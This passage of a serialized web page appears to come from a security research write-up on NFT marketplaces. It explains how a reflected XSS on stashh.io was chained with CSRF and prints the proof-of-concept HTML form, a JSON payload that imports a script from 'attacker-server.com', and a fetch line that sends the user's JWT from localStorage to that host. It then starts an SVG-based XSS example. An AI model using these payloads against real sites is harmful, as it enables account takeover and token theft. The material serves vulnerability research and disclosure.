"children":37145},{"style":36338},[37146],{"type":31,"value":9943},{"type":25,"tag":38,"props":37148,"children":37149},{},[37150],{"type":31,"value":37151},"When playing around with the application, we discovered that if an invalid address was submitted, the user's input would be reflected directly inside the response, another possible XSS vulnerability.",{"type":25,"tag":38,"props":37153,"children":37154},{},[37155],{"type":31,"value":37156},"However, since the request was a POST request, we initially thought this was only a self-XSS.",{"type":25,"tag":38,"props":37158,"children":37159},{},[37160],{"type":31,"value":37161},"In an effort to increase the impact of the above vulnerability, we discovered a way to leverage Cross-Site Request Forgery (CSRF) to manipulate the user's browser into sending a forced request that contained our XSS payload.",{"type":25,"tag":38,"props":37163,"children":37164},{},[37165],{"type":31,"value":37166},"From here, we were able to steal the session cookie from local storage.",{"type":25,"tag":206,"props":37168,"children":37170},{"className":35325,"code":37169,"language":35327,"meta":7,"style":7},"\u003Chtml>\n  \u003Cbody>\n  \u003Cscript>history.pushState('', '', '/')\u003C/script>\n    \u003Cform id=\"form123\" action=\"https://stashh.io/upload_asset\" method=\"POST\" enctype=\"multipart/form-data\" value=\"asd\">\n     \u003Cinput type=\"file\" name=\"data\" id=\"file123\">\n      \u003Cinput type=\"hidden\" name=\"config\" value=\"{"address":"<img/src=x onerror=import(`https://attacker-server.com/leak.js`)>","to":"profile-assets","type":"icon"}\" />\n      \u003Cinput type=\"submit\" value=\"Submit request\" />\n    \u003C/form>\n  \u003C/body>\n\n  \u003Cscript>\n\n    (async ()=>{\n        const blob = await (await fetch(\"/sapo.png\")).blob()\n\n        let f = new File([blob], 'sapo.png', {type: 'image/png'})\n        const dataTransfer = new DataTransfer();\n        dataTransfer.items.add(f);\n\n        file123.files = dataTransfer.files;\n\n        form123.submit()\n    })()\n\n  \u003C/script>\n\u003C/html>\n",[37171],{"type":25,"tag":82,"props":37172,"children":37173},{"__ignoreMap":7},[37174,37189,37204,37235,37310,37361,37549,37588,37603,37618,37625,37640,37647,37658,37709,37716,37771,37798,37833,37840,37875,37882,37903,37914,37921,37936],{"type":25,"tag":216,"props":37175,"children":37176},{"class":6922,"line":6923},[37177,37181,37185],{"type":25,"tag":216,"props":37178,"children":37179},{"style":36338},[37180],{"type":31,"value":9757},{"type":25,"tag":216,"props":37182,"children":37183},{"style":6936},[37184],{"type":31,"value":36345},{"type":25,"tag":216,"props":37186,"children":37187},{"style":36338},[37188],{"type":31,"value":9943},{"type":25,"tag":216,"props":37190,"children":37191},{"class":6922,"line":6769},[37192,37196,37200],{"type":25,"tag":216,"props":37193,"children":37194},{"style":36338},[37195],{"type":31,"value":36357},{"type":25,"tag":216,"props":37197,"children":37198},{"style":6936},[37199],{"type":31,"value":36362},{"type":25,"tag":216,"props":37201,"children":37202},{"style":36338},[37203],{"type":31,"value":9943},{"type":25,"tag":216,"props":37205,"children":37206},{"class":6922,"line":6778},[37207,37211,37215,37219,37223,37227,37231],{"type":25,"tag":216,"props":37208,"children":37209},{"style":36338},[37210],{"type":31,"value":36357},{"type":25,"tag":216,"props":37212,"children":37213},{"style":6936},[37214],{"type":31,"value":36378},{"type":25,"tag":216,"props":37216,"children":37217},{"style":36338},[37218],{"type":31,"value":5902},{"type":25,"tag":216,"props":37220,"children":37221},{"style":6964},[37222],{"type":31,"value":36387},{"type":25,"tag":216,"props":37224,"children":37225},{"style":36338},[37226],{"type":31,"value":36392},{"type":25,"tag":216,"props":37228,"children":37229},{"style":6936},[37230],{"type":31,"value":36378},{"type":25,"tag":216,"props":37232,"children":37233},{"style":36338},[37234],{"type":31,"value":9943},{"type":25,"tag":216,"props":37236,"children":37237},{"class":6922,"line":7005},[37238,37242,37246,37250,37254,37258,37262,37266,37270,37274,37278,37282,37286,37290,37294,37298,37302,37306],{"type":25,"tag":216,"props":37239,"children":37240},{"style":36338},[37241],{"type":31,"value":36408},{"type":25,"tag":216,"props":37243,"children":37244},{"style":6936},[37245],{"type":31,"value":36413},{"type":25,"tag":216,"props":37247,"children":37248},{"style":6947},[37249],{"type":31,"value":36418},{"type":25,"tag":216,"props":37251,"children":37252},{"style":6953},[37253],{"type":31,"value":266},{"type":25,"tag":216,"props":37255,"children":37256},{"style":8205},[37257],{"type":31,"value":36427},{"type":25,"tag":216,"props":37259,"children":37260},{"style":6947},[37261],{"type":31,"value":36432},{"type":25,"tag":216,"props":37263,"children":37264},{"style":6953},[37265],{"type":31,"value":266},{"type":25,"tag":216,"props":37267,"children":37268},{"style":8205},[37269],{"type":31,"value":36441},{"type":25,"tag":216,"props":37271,"children":37272},{"style":6947},[37273],{"type":31,"value":21068},{"type":25,"tag":216,"props":37275,"children":37276},{"style":6953},[37277],{"type":31,"value":266},{"type":25,"tag":216,"props":37279,"children":37280},{"style":8205},[37281],{"type":31,"value":36454},{"type":25,"tag":216,"props":37283,"children":37284},{"style":6947},[37285],{"type":31,"value":36459},{"type":25,"tag":216,"props":37287,"children":37288},{"style":6953},[37289],{"type":31,"value":266},{"type":25,"tag":216,"props":37291,"children":37292},{"style":8205},[37293],{"type":31,"value":36468},{"type":25,"tag":216,"props":37295,"children":37296},{"style":6947},[37297],{"type":31,"value":36473},{"type":25,"tag":216,"props":37299,"children":37300},{"style":6953},[37301],{"type":31,"value":266},{"type":25,"tag":216,"props":37303,"children":37304},{"style":8205},[37305],{"type":31,"value":36482},{"type":25,"tag":216,"props":37307,"children":37308},{"style":36338},[37309],{"type":31,"value":9943},{"type":25,"tag":216,"props":37311,"children":37312},{"class":6922,"line":7110},[37313,37317,37321,37325,37329,37333,37337,37341,37345,37349,37353,37357],{"type":25,"tag":216,"props":37314,"children":37315},{"style":36338},[37316],{"type":31,"value":36494},{"type":25,"tag":216,"props":37318,"children":37319},{"style":6936},[37320],{"type":31,"value":12319},{"type":25,"tag":216,"props":37322,"children":37323},{"style":6947},[37324],{"type":31,"value":36503},{"type":25,"tag":216,"props":37326,"children":37327},{"style":6953},[37328],{"type":31,"value":266},{"type":25,"tag":216,"props":37330,"children":37331},{"style":8205},[37332],{"type":31,"value":36512},{"type":25,"tag":216,"props":37334,"children":37335},{"style":6947},[37336],{"type":31,"value":36517},{"type":25,"tag":216,"props":37338,"children":37339},{"style":6953},[37340],{"type":31,"value":266},{"type":25,"tag":216,"props":37342,"children":37343},{"style":8205},[37344],{"type":31,"value":36526},{"type":25,"tag":216,"props":37346,"children":37347},{"style":6947},[37348],{"type":31,"value":36418},{"type":25,"tag":216,"props":37350,"children":37351},{"style":6953},[37352],{"type":31,"value":266},{"type":25,"tag":216,"props":37354,"children":37355},{"style":8205},[37356],{"type":31,"value":36539},{"type":25,"tag":216,"props":37358,"children":37359},{"style":36338},[37360],{"type":31,"value":9943},{"type":25,"tag":216,"props":37362,"children":37363},{"class":6922,"line":7216},[37364,37368,37372,37376,37380,37384,37388,37392,37396,37400,37404,37408,37413,37417,37422,37426,37431,37435,37440,37445,37449,37453,37458,37463,37468,37473,37478,37483,37487,37492,37496,37500,37505,37509,37514,37519,37524,37528,37532,37536,37541,37545],{"type":25,"tag":216,"props":37365,"children":37366},{"style":36338},[37367],{"type":31,"value":36551},{"type":25,"tag":216,"props":37369,"children":37370},{"style":6936},[37371],{"type":31,"value":12319},{"type":25,"tag":216,"props":37373,"children":37374},{"style":6947},[37375],{"type":31,"value":36503},{"type":25,"tag":216,"props":37377,"children":37378},{"style":6953},[37379],{"type":31,"value":266},{"type":25,"tag":216,"props":37381,"children":37382},{"style":8205},[37383],{"type":31,"value":36568},{"type":25,"tag":216,"props":37385,"children":37386},{"style":6947},[37387],{"type":31,"value":36517},{"type":25,"tag":216,"props":37389,"children":37390},{"style":6953},[37391],{"type":31,"value":266},{"type":25,"tag":216,"props":37393,"children":37394},{"style":8205},[37395],{"type":31,"value":36581},{"type":25,"tag":216,"props":37397,"children":37398},{"style":6947},[37399],{"type":31,"value":36473},{"type":25,"tag":216,"props":37401,"children":37402},{"style":6953},[37403],{"type":31,"value":266},{"type":25,"tag":216,"props":37405,"children":37406},{"style":8205},[37407],{"type":31,"value":24020},{"type":25,"tag":216,"props":37409,"children":37410},{"style":6936},[37411],{"type":31,"value":37412},"{"",{"type":25,"tag":216,"props":37414,"children":37415},{"style":8205},[37416],{"type":31,"value":36603},{"type":25,"tag":216,"props":37418,"children":37419},{"style":6936},[37420],{"type":31,"value":37421},"":"<",{"type":25,"tag":216,"props":37423,"children":37424},{"style":8205},[37425],{"type":31,"value":6467},{"type":25,"tag":216,"props":37427,"children":37428},{"style":6936},[37429],{"type":31,"value":37430},"/",{"type":25,"tag":216,"props":37432,"children":37433},{"style":8205},[37434],{"type":31,"value":36632},{"type":25,"tag":216,"props":37436,"children":37437},{"style":6936},[37438],{"type":31,"value":37439},"=",{"type":25,"tag":216,"props":37441,"children":37442},{"style":8205},[37443],{"type":31,"value":37444},"x onerror",{"type":25,"tag":216,"props":37446,"children":37447},{"style":6936},[37448],{"type":31,"value":37439},{"type":25,"tag":216,"props":37450,"children":37451},{"style":8205},[37452],{"type":31,"value":23443},{"type":25,"tag":216,"props":37454,"children":37455},{"style":6936},[37456],{"type":31,"value":37457},"(`",{"type":25,"tag":216,"props":37459,"children":37460},{"style":8205},[37461],{"type":31,"value":37462},"https",{"type":25,"tag":216,"props":37464,"children":37465},{"style":6936},[37466],{"type":31,"value":37467},"://",{"type":25,"tag":216,"props":37469,"children":37470},{"style":8205},[37471],{"type":31,"value":37472},"attacker-server",{"type":25,"tag":216,"props":37474,"children":37475},{"style":6936},[37476],{"type":31,"value":37477},".",{"type":25,"tag":216,"props":37479,"children":37480},{"style":8205},[37481],{"type":31,"value":37482},"com",{"type":25,"tag":216,"props":37484,"children":37485},{"style":6936},[37486],{"type":31,"value":37430},{"type":25,"tag":216,"props":37488,"children":37489},{"style":8205},[37490],{"type":31,"value":37491},"leak",{"type":25,"tag":216,"props":37493,"children":37494},{"style":6936},[37495],{"type":31,"value":37477},{"type":25,"tag":216,"props":37497,"children":37498},{"style":8205},[37499],{"type":31,"value":35327},{"type":25,"tag":216,"props":37501,"children":37502},{"style":6936},[37503],{"type":31,"value":37504},"`)>","",{"type":25,"tag":216,"props":37506,"children":37507},{"style":8205},[37508],{"type":31,"value":36690},{"type":25,"tag":216,"props":37510,"children":37511},{"style":6936},[37512],{"type":31,"value":37513},"":"",{"type":25,"tag":216,"props":37515,"children":37516},{"style":8205},[37517],{"type":31,"value":37518},"profile-assets",{"type":25,"tag":216,"props":37520,"children":37521},{"style":6936},[37522],{"type":31,"value":37523},"","",{"type":25,"tag":216,"props":37525,"children":37526},{"style":8205},[37527],{"type":31,"value":36719},{"type":25,"tag":216,"props":37529,"children":37530},{"style":6936},[37531],{"type":31,"value":37513},{"type":25,"tag":216,"props":37533,"children":37534},{"style":8205},[37535],{"type":31,"value":36728},{"type":25,"tag":216,"props":37537,"children":37538},{"style":6936},[37539],{"type":31,"value":37540},""}",{"type":25,"tag":216,"props":37542,"children":37543},{"style":8205},[37544],{"type":31,"value":24020},{"type":25,"tag":216,"props":37546,"children":37547},{"style":36338},[37548],{"type":31,"value":36742},{"type":25,"tag":216,"props":37550,"children":37551},{"class":6922,"line":7244},[37552,37556,37560,37564,37568,37572,37576,37580,37584],{"type":25,"tag":216,"props":37553,"children":37554},{"style":36338},[37555],{"type":31,"value":36551},{"type":25,"tag":216,"props":37557,"children":37558},{"style":6936},[37559],{"type":31,"value":12319},{"type":25,"tag":216,"props":37561,"children":37562},{"style":6947},[37563],{"type":31,"value":36503},{"type":25,"tag":216,"props":37565,"children":37566},{"style":6953},[37567],{"type":31,"value":266},{"type":25,"tag":216,"props":37569,"children":37570},{"style":8205},[37571],{"type":31,"value":36766},{"type":25,"tag":216,"props":37573,"children":37574},{"style":6947},[37575],{"type":31,"value":36473},{"type":25,"tag":216,"props":37577,"children":37578},{"style":6953},[37579],{"type":31,"value":266},{"type":25,"tag":216,"props":37581,"children":37582},{"style":8205},[37583],{"type":31,"value":36779},{"type":25,"tag":216,"props":37585,"children":37586},{"style":36338},[37587],{"type":31,"value":36742},{"type":25,"tag":216,"props":37589,"children":37590},{"class":6922,"line":7257},[37591,37595,37599],{"type":25,"tag":216,"props":37592,"children":37593},{"style":36338},[37594],{"type":31,"value":36791},{"type":25,"tag":216,"props":37596,"children":37597},{"style":6936},[37598],{"type":31,"value":36413},{"type":25,"tag":216,"props":37600,"children":37601},{"style":36338},[37602],{"type":31,"value":9943},{"type":25,"tag":216,"props":37604,"children":37605},{"class":6922,"line":7275},[37606,37610,37614],{"type":25,"tag":216,"props":37607,"children":37608},{"style":36338},[37609],{"type":31,"value":36807},{"type":25,"tag":216,"props":37611,"children":37612},{"style":6936},[37613],{"type":31,"value":36362},{"type":25,"tag":216,"props":37615,"children":37616},{"style":36338},[37617],{"type":31,"value":9943},{"type":25,"tag":216,"props":37619,"children":37620},{"class":6922,"line":7296},[37621],{"type":25,"tag":216,"props":37622,"children":37623},{"emptyLinePlaceholder":16},[37624],{"type":31,"value":7642},{"type":25,"tag":216,"props":37626,"children":37627},{"class":6922,"line":7305},[37628,37632,37636],{"type":25,"tag":216,"props":37629,"children":37630},{"style":36338},[37631],{"type":31,"value":36357},{"type":25,"tag":216,"props":37633,"children":37634},{"style":6936},[37635],{"type":31,"value":36378},{"type":25,"tag":216,"props":37637,"children":37638},{"style":36338},[37639],{"type":31,"value":9943},{"type":25,"tag":216,"props":37641,"children":37642},{"class":6922,"line":7557},[37643],{"type":25,"tag":216,"props":37644,"children":37645},{"emptyLinePlaceholder":16},[37646],{"type":31,"value":7642},{"type":25,"tag":216,"props":37648,"children":37649},{"class":6922,"line":7574},[37650,37654],{"type":25,"tag":216,"props":37651,"children":37652},{"style":6964},[37653],{"type":31,"value":36852},{"type":25,"tag":216,"props":37655,"children":37656},{"style":6936},[37657],{"type":31,"value":14836},{"type":25,"tag":216,"props":37659,"children":37660},{"class":6922,"line":7591},[37661,37665,37669,37673,37677,37681,37685,37689,37693,37697,37701,37705],{"type":25,"tag":216,"props":37662,"children":37663},{"style":6947},[37664],{"type":31,"value":36864},{"type":25,"tag":216,"props":37666,"children":37667},{"style":6947},[37668],{"type":31,"value":36869},{"type":25,"tag":216,"props":37670,"children":37671},{"style":6953},[37672],{"type":31,"value":4983},{"type":25,"tag":216,"props":37674,"children":37675},{"style":6973},[37676],{"type":31,"value":36878},{"type":25,"tag":216,"props":37678,"children":37679},{"style":6953},[37680],{"type":31,"value":7016},{"type":25,"tag":216,"props":37682,"children":37683},{"style":6973},[37684],{"type":31,"value":36878},{"type":25,"tag":216,"props":37686,"children":37687},{"style":7047},[37688],{"type":31,"value":36891},{"type":25,"tag":216,"props":37690,"children":37691},{"style":6953},[37692],{"type":31,"value":1850},{"type":25,"tag":216,"props":37694,"children":37695},{"style":8205},[37696],{"type":31,"value":36900},{"type":25,"tag":216,"props":37698,"children":37699},{"style":6953},[37700],{"type":31,"value":36905},{"type":25,"tag":216,"props":37702,"children":37703},{"style":7047},[37704],{"type":31,"value":36910},{"type":25,"tag":216,"props":37706,"children":37707},{"style":6953},[37708],{"type":31,"value":11687},{"type":25,"tag":216,"props":37710,"children":37711},{"class":6922,"line":7604},[37712],{"type":25,"tag":216,"props":37713,"children":37714},{"emptyLinePlaceholder":16},[37715],{"type":31,"value":7642},{"type":25,"tag":216,"props":37717,"children":37718},{"class":6922,"line":7613},[37719,37723,37727,37731,37735,37739,37743,37747,37751,37755,37759,37763,37767],{"type":25,"tag":216,"props":37720,"children":37721},{"style":6947},[37722],{"type":31,"value":7011},{"type":25,"tag":216,"props":37724,"children":37725},{"style":6947},[37726],{"type":31,"value":36933},{"type":25,"tag":216,"props":37728,"children":37729},{"style":6953},[37730],{"type":31,"value":4983},{"type":25,"tag":216,"props":37732,"children":37733},{"style":6936},[37734],{"type":31,"value":19080},{"type":25,"tag":216,"props":37736,"children":37737},{"style":7047},[37738],{"type":31,"value":36946},{"type":25,"tag":216,"props":37740,"children":37741},{"style":6953},[37742],{"type":31,"value":36951},{"type":25,"tag":216,"props":37744,"children":37745},{"style":6947},[37746],{"type":31,"value":36910},{"type":25,"tag":216,"props":37748,"children":37749},{"style":6953},[37750],{"type":31,"value":27006},{"type":25,"tag":216,"props":37752,"children":37753},{"style":8205},[37754],{"type":31,"value":36964},{"type":25,"tag":216,"props":37756,"children":37757},{"style":6953},[37758],{"type":31,"value":36969},{"type":25,"tag":216,"props":37760,"children":37761},{"style":6947},[37762],{"type":31,"value":36974},{"type":25,"tag":216,"props":37764,"children":37765},{"style":8205},[37766],{"type":31,"value":36979},{"type":25,"tag":216,"props":37768,"children":37769},{"style":6953},[37770],{"type":31,"value":36984},{"type":25,"tag":216,"props":37772,"children":37773},{"class":6922,"line":7636},[37774,37778,37782,37786,37790,37794],{"type":25,"tag":216,"props":37775,"children":37776},{"style":6947},[37777],{"type":31,"value":36864},{"type":25,"tag":216,"props":37779,"children":37780},{"style":6947},[37781],{"type":31,"value":36996},{"type":25,"tag":216,"props":37783,"children":37784},{"style":6953},[37785],{"type":31,"value":4983},{"type":25,"tag":216,"props":37787,"children":37788},{"style":6936},[37789],{"type":31,"value":19080},{"type":25,"tag":216,"props":37791,"children":37792},{"style":7047},[37793],{"type":31,"value":37009},{"type":25,"tag":216,"props":37795,"children":37796},{"style":6953},[37797],{"type":31,"value":7633},{"type":25,"tag":216,"props":37799,"children":37800},{"class":6922,"line":7645},[37801,37805,37809,37813,37817,37821,37825,37829],{"type":25,"tag":216,"props":37802,"children":37803},{"style":6947},[37804],{"type":31,"value":37021},{"type":25,"tag":216,"props":37806,"children":37807},{"style":6953},[37808],{"type":31,"value":179},{"type":25,"tag":216,"props":37810,"children":37811},{"style":6947},[37812],{"type":31,"value":37030},{"type":25,"tag":216,"props":37814,"children":37815},{"style":6953},[37816],{"type":31,"value":179},{"type":25,"tag":216,"props":37818,"children":37819},{"style":7047},[37820],{"type":31,"value":13594},{"type":25,"tag":216,"props":37822,"children":37823},{"style":6953},[37824],{"type":31,"value":1850},{"type":25,"tag":216,"props":37826,"children":37827},{"style":6947},[37828],{"type":31,"value":37047},{"type":25,"tag":216,"props":37830,"children":37831},{"style":6953},[37832],{"type":31,"value":7797},{"type":25,"tag":216,"props":37834,"children":37835},{"class":6922,"line":7654},[37836],{"type":25,"tag":216,"props":37837,"children":37838},{"emptyLinePlaceholder":16},[37839],{"type":31,"value":7642},{"type":25,"tag":216,"props":37841,"children":37842},{"class":6922,"line":7722},[37843,37847,37851,37855,37859,37863,37867,37871],{"type":25,"tag":216,"props":37844,"children":37845},{"style":6947},[37846],{"type":31,"value":37066},{"type":25,"tag":216,"props":37848,"children":37849},{"style":6953},[37850],{"type":31,"value":179},{"type":25,"tag":216,"props":37852,"children":37853},{"style":6947},[37854],{"type":31,"value":37075},{"type":25,"tag":216,"props":37856,"children":37857},{"style":6953},[37858],{"type":31,"value":4983},{"type":25,"tag":216,"props":37860,"children":37861},{"style":6947},[37862],{"type":31,"value":37084},{"type":25,"tag":216,"props":37864,"children":37865},{"style":6953},[37866],{"type":31,"value":179},{"type":25,"tag":216,"props":37868,"children":37869},{"style":6947},[37870],{"type":31,"value":37075},{"type":25,"tag":216,"props":37872,"children":37873},{"style":6953},[37874],{"type":31,"value":6967},{"type":25,"tag":216,"props":37876,"children":37877},{"class":6922,"line":7730},[37878],{"type":25,"tag":216,"props":37879,"children":37880},{"emptyLinePlaceholder":16},[37881],{"type":31,"value":7642},{"type":25,"tag":216,"props":37883,"children":37884},{"class":6922,"line":7760},[37885,37890,37894,37899],{"type":25,"tag":216,"props":37886,"children":37887},{"style":6947},[37888],{"type":31,"value":37889},"        form123",{"type":25,"tag":216,"props":37891,"children":37892},{"style":6953},[37893],{"type":31,"value":179},{"type":25,"tag":216,"props":37895,"children":37896},{"style":7047},[37897],{"type":31,"value":37898},"submit",{"type":25,"tag":216,"props":37900,"children":37901},{"style":6953},[37902],{"type":31,"value":11687},{"type":25,"tag":216,"props":37904,"children":37905},{"class":6922,"line":7768},[37906,37910],{"type":25,"tag":216,"props":37907,"children":37908},{"style":6936},[37909],{"type":31,"value":37104},{"type":25,"tag":216,"props":37911,"children":37912},{"style":6964},[37913],{"type":31,"value":37109},{"type":25,"tag":216,"props":37915,"children":37916},{"class":6922,"line":7800},[37917],{"type":25,"tag":216,"props":37918,"children":37919},{"emptyLinePlaceholder":16},[37920],{"type":31,"value":7642},{"type":25,"tag":216,"props":37922,"children":37923},{"class":6922,"line":7808},[37924,37928,37932],{"type":25,"tag":216,"props":37925,"children":37926},{"style":36338},[37927],{"type":31,"value":36807},{"type":25,"tag":216,"props":37929,"children":37930},{"style":6936},[37931],{"type":31,"value":36378},{"type":25,"tag":216,"props":37933,"children":37934},{"style":36338},[37935],{"type":31,"value":9943},{"type":25,"tag":216,"props":37937,"children":37938},{"class":6922,"line":7868},[37939,37943,37947],{"type":25,"tag":216,"props":37940,"children":37941},{"style":36338},[37942],{"type":31,"value":36392},{"type":25,"tag":216,"props":37944,"children":37945},{"style":6936},[37946],{"type":31,"value":36345},{"type":25,"tag":216,"props":37948,"children":37949},{"style":36338},[37950],{"type":31,"value":9943},{"type":25,"tag":38,"props":37952,"children":37953},{},[37954],{"type":31,"value":37955},"This script automatically sends the following config in POST body, which triggers the XSS and imports a malicious javascript file from attacker's server:",{"type":25,"tag":206,"props":37957,"children":37961},{"className":37958,"code":37959,"language":37960,"meta":7,"style":7},"language-json shiki shiki-themes slack-dark","{\n  \"address\": \"\u003Cimg/src=x onerror=import(`https://attacker-server.com/leak.js`)>\",\n  \"to\": \"profile-assets\",\n  \"type\": \"icon\"\n}\n","json",[37962],{"type":25,"tag":82,"props":37963,"children":37964},{"__ignoreMap":7},[37965,37972,37993,38014,38031],{"type":25,"tag":216,"props":37966,"children":37967},{"class":6922,"line":6923},[37968],{"type":25,"tag":216,"props":37969,"children":37970},{"style":6964},[37971],{"type":31,"value":14836},{"type":25,"tag":216,"props":37973,"children":37974},{"class":6922,"line":6769},[37975,37980,37984,37989],{"type":25,"tag":216,"props":37976,"children":37977},{"style":6947},[37978],{"type":31,"value":37979},"  \"address\"",{"type":25,"tag":216,"props":37981,"children":37982},{"style":6964},[37983],{"type":31,"value":19288},{"type":25,"tag":216,"props":37985,"children":37986},{"style":8205},[37987],{"type":31,"value":37988},"\"\u003Cimg/src=x onerror=import(`https://attacker-server.com/leak.js`)>\"",{"type":25,"tag":216,"props":37990,"children":37991},{"style":6964},[37992],{"type":31,"value":7465},{"type":25,"tag":216,"props":37994,"children":37995},{"class":6922,"line":6778},[37996,38001,38005,38010],{"type":25,"tag":216,"props":37997,"children":37998},{"style":6947},[37999],{"type":31,"value":38000},"  \"to\"",{"type":25,"tag":216,"props":38002,"children":38003},{"style":6964},[38004],{"type":31,"value":19288},{"type":25,"tag":216,"props":38006,"children":38007},{"style":8205},[38008],{"type":31,"value":38009},"\"profile-assets\"",{"type":25,"tag":216,"props":38011,"children":38012},{"style":6964},[38013],{"type":31,"value":7465},{"type":25,"tag":216,"props":38015,"children":38016},{"class":6922,"line":7005},[38017,38022,38026],{"type":25,"tag":216,"props":38018,"children":38019},{"style":6947},[38020],{"type":31,"value":38021},"  \"type\"",{"type":25,"tag":216,"props":38023,"children":38024},{"style":6964},[38025],{"type":31,"value":19288},{"type":25,"tag":216,"props":38027,"children":38028},{"style":8205},[38029],{"type":31,"value":38030},"\"icon\"\n",{"type":25,"tag":216,"props":38032,"children":38033},{"class":6922,"line":7110},[38034],{"type":25,"tag":216,"props":38035,"children":38036},{"style":6964},[38037],{"type":31,"value":7874},{"type":25,"tag":38,"props":38039,"children":38040},{},[38041],{"type":31,"value":38042},"Then, the imported script is able to exfiltrate the JWT authentication token from stashh.io:",{"type":25,"tag":206,"props":38044,"children":38046},{"className":35325,"code":38045,"language":35327,"meta":7,"style":7},"fetch(`https://attacker-server.com/?token_leak=${localStorage.getItem('token')}`);\n",[38047],{"type":25,"tag":82,"props":38048,"children":38049},{"__ignoreMap":7},[38050],{"type":25,"tag":216,"props":38051,"children":38052},{"class":6922,"line":6923},[38053,38058,38062,38067,38072,38077,38081,38086,38090,38095,38099,38104,38108],{"type":25,"tag":216,"props":38054,"children":38055},{"style":7047},[38056],{"type":31,"value":38057},"fetch",{"type":25,"tag":216,"props":38059,"children":38060},{"style":6964},[38061],{"type":31,"value":1850},{"type":25,"tag":216,"props":38063,"children":38064},{"style":8205},[38065],{"type":31,"value":38066},"`https://attacker-server.com/?token_leak=",{"type":25,"tag":216,"props":38068,"children":38069},{"style":6936},[38070],{"type":31,"value":38071},"${",{"type":25,"tag":216,"props":38073,"children":38074},{"style":6947},[38075],{"type":31,"value":38076},"localStorage",{"type":25,"tag":216,"props":38078,"children":38079},{"style":6953},[38080],{"type":31,"value":179},{"type":25,"tag":216,"props":38082,"children":38083},{"style":7047},[38084],{"type":31,"value":38085},"getItem",{"type":25,"tag":216,"props":38087,"children":38088},{"style":6953},[38089],{"type":31,"value":1850},{"type":25,"tag":216,"props":38091,"children":38092},{"style":8205},[38093],{"type":31,"value":38094},"'token'",{"type":25,"tag":216,"props":38096,"children":38097},{"style":6953},[38098],{"type":31,"value":1888},{"type":25,"tag":216,"props":38100,"children":38101},{"style":6936},[38102],{"type":31,"value":38103},"}",{"type":25,"tag":216,"props":38105,"children":38106},{"style":8205},[38107],{"type":31,"value":14339},{"type":25,"tag":216,"props":38109,"children":38110},{"style":6964},[38111],{"type":31,"value":7797},{"type":25,"tag":606,"props":38113,"children":38115},{"id":38114},"svgs",[38116],{"type":31,"value":38117},"SVGs",{"type":25,"tag":38,"props":38119,"children":38120},{},[38121],{"type":31,"value":38122},"After closely analyzing various NFT marketplaces, we noticed a common shared feature; the ability to update profile pictures or insert NFT assets using SVG files. SVG is an XML- based format that defines graphics and how they interact.",{"type":25,"tag":38,"props":38124,"children":38125},{},[38126],{"type":31,"value":38127},"Unbeknownst to some people, SVG files can contain JavaScript and run arbitrary scripts.",{"type":25,"tag":206,"props":38129,"children":38131},{"className":35325,"code":38130,"language":35327,"meta":7,"style":7},"\u003C?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\u003C!DOCTYPE svg PUBLIC \"-//W3C//DTD SVG 1.1//EN\" \"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd\">\n\n \u003Csvg xmlns=\"http://www.w3.org/2000/svg\">\n  \u003Ctitle>XSS\u003C/title>\n  \u003Cscript type=\"text/javascript\">\n   alert(document.domain);\n   \u003C/script>\n \u003C/svg>\n",[38132],{"type":25,"tag":82,"props":38133,"children":38134},{"__ignoreMap":7},[38135,38181,38218,38225,38255,38287,38315,38323,38339],{"type":25,"tag":216,"props":38136,"children":38137},{"class":6922,"line":6923},[38138,38143,38148,38153,38157,38162,38167,38171,38176],{"type":25,"tag":216,"props":38139,"children":38140},{"style":6953},[38141],{"type":31,"value":38142},"\u003C?",{"type":25,"tag":216,"props":38144,"children":38145},{"style":6947},[38146],{"type":31,"value":38147},"xml",{"type":25,"tag":216,"props":38149,"children":38150},{"style":6947},[38151],{"type":31,"value":38152}," version",{"type":25,"tag":216,"props":38154,"children":38155},{"style":6953},[38156],{"type":31,"value":266},{"type":25,"tag":216,"props":38158,"children":38159},{"style":8205},[38160],{"type":31,"value":38161},"\"1.0\"",{"type":25,"tag":216,"props":38163,"children":38164},{"style":6947},[38165],{"type":31,"value":38166}," encoding",{"type":25,"tag":216,"props":38168,"children":38169},{"style":6953},[38170],{"type":31,"value":266},{"type":25,"tag":216,"props":38172,"children":38173},{"style":8205},[38174],{"type":31,"value":38175},"\"UTF-8\"",{"type":25,"tag":216,"props":38177,"children":38178},{"style":6953},[38179],{"type":31,"value":38180},"?>\n",{"type":25,"tag":216,"props":38182,"children":38183},{"class":6922,"line":6769},[38184,38189,38194,38199,38204,38209,38214],{"type":25,"tag":216,"props":38185,"children":38186},{"style":6953},[38187],{"type":31,"value":38188},"\u003C!",{"type":25,"tag":216,"props":38190,"children":38191},{"style":6947},[38192],{"type":31,"value":38193},"DOCTYPE",{"type":25,"tag":216,"props":38195,"children":38196},{"style":6947},[38197],{"type":31,"value":38198}," svg",{"type":25,"tag":216,"props":38200,"children":38201},{"style":6947},[38202],{"type":31,"value":38203}," PUBLIC",{"type":25,"tag":216,"props":38205,"children":38206},{"style":8205},[38207],{"type":31,"value":38208}," \"-//W3C//DTD SVG 1.1//EN\"",{"type":25,"tag":216,"props":38210,"children":38211},{"style":8205},[38212],{"type":31,"value":38213}," \"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd\"",{"type":25,"tag":216,"props":38215,"children":38216},{"style":6953},[38217],{"type":31,"value":9943},{"type":25,"tag":216,"props":38219,"children":38220},{"class":6922,"line":6778},[38221],{"type":25,"tag":216,"props":38222,"children":38223},{"emptyLinePlaceholder":16},[38224],{"type":31,"value":7642},{"type":25,"tag":216,"props":38226,"children":38227},{"class":6922,"line":7005},[38228,38232,38237,38242,38246,38251],{"type":25,"tag":216,"props":38229,"children":38230},{"style":36338},[38231],{"type":31,"value":12672},{"type":25,"tag":216,"props":38233,"children":38234},{"style":6936},[38235],{"type":31,"value":38236},"svg",{"type":25,"tag":216,"props":38238,"children":38239},{"style":6947},[38240],{"type":31,"value":38241}," 